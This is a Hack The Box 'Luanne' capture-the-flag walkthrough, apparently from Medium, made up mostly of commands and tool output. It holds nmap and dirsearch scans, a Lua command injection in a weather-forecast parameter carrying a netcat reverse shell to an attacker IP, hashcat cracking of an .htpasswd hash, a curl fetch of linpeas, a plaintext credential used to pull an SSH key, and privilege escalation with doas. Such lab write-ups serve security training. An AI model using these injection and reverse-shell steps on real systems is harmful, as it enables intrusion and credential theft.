Luanne Walkthrough ️

☠️ Hack The Box ☠️

Port Scanning : Nmap

Command :

nmap -v -sC -sT -sV -A -p- 10.10.10.218
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/27%OT=22%CT=1%CU=31120%PV=Y%DS=2%DC=T%G=Y%TM=605E2D9
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=D8%GCD=1%ISR=DC%TI=Z%CI=Z%II=I)OPS(O1=M54
OS:DNW3ST11%O2=M54DNW3ST11%O3=M54DNW3NNT11%O4=M54DNW3ST11%O5=M54DNW3ST11%O6
OS:=M54DST11)WIN(W1=8000%W2=8000%W3=8000%W4=8000%W5=8000%W6=8000)ECN(R=Y%DF
OS:=Y%T=40%W=8000%O=M54DNW3SLL%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=Y%DF=N%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=8000%
OS:S=O%A=S+%F=AS%O=M54DNW3ST11%RD=0%Q=)T4(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=FF%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=FF%CD=S)
Uptime guess: 0.001 days (since Sat Mar 27 00:21:41 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=213 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 216.70 ms 10.10.14.1
2 216.88 ms luanne.htb (10.10.10.218)
NSE: Script Post-scanning.
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2786.73 seconds
Raw packets sent: 94 (7.522KB) | Rcvd: 172 (36.766KB)

Port 80 Enumeration

From the port scanning we come to know about that the port 80 is open whics is assigned for http ( web service ) . On visiting to the port 80 we find that there is a basic authentication is put up for the web page .

dirsearch -u http://10.10.10.218/ -E
  _|. _ _  _  _  _ _|_    v0.4.0
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 10023Error Log: /root/dirsearch/logs/errors-21–03–26_23–40–21.logTarget: http://10.10.10.218/Output File: /root/dirsearch/reports/10.10.10.218/_21–03–26_23–40–22.txt[23:40:22] Starting:
[23:41:38] 200–612B — /index.html
[23:42:01] 200–78B — /robots.txt
Task Completed
dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.218/weather -E
dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.218/weather/ -E_|. _ _ _ _ _ _|_ v0.4.0
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 220520Error Log: /root/dirsearch/logs/errors-21–03–27_00–19–22.logTarget: http://10.10.10.218/weather/Output File: /root/dirsearch/reports/10.10.10.218/weather_21–03–27_00–19–22.txt[00:19:22] Starting:
[00:20:47] 200–90B — /weather/forecast
CTRL+C detected: Pausing threads, please wait…
http://10.10.10.218/weather/forecast?city=list
http://10.10.10.218/weather/forecast?city=London
http://10.10.10.218/weather/forecast?city=London’
https://gtfobins.github.io/#
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md
http://10.10.10.218/weather/forecast?city=London‘);os.execute(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.112 4455 >/tmp/f”)-- 
http://10.10.10.218/weather/forecast?city=London%27)%3Bos.execute(%22rm%20%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.112%204455%20%3E%2Ftmp%2Ff%22)--
nc -nlvp 4455
$ cd /var/www$ ls -lah$ cat .htpasswd
hashcat --help | grep -i unix
hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt --show
netstat -an
curl http://10.10.14.112/linpeas.sh --output /tmp/linpeas.shchmod +x linpeas.sh./linpeas.sh
r.michaels 185 0.0 0.0 35268 2008 ? Is 5:57AM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www
curl --user webapi_user:iamthebest 127.0.0.1:3001/~r.michaels/id_rsa
# vim id_rsa (put the key inside it)# chmod 600 id_rsa
ssh -i id_rsa r.michaels@10.10.10.218
doas su

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store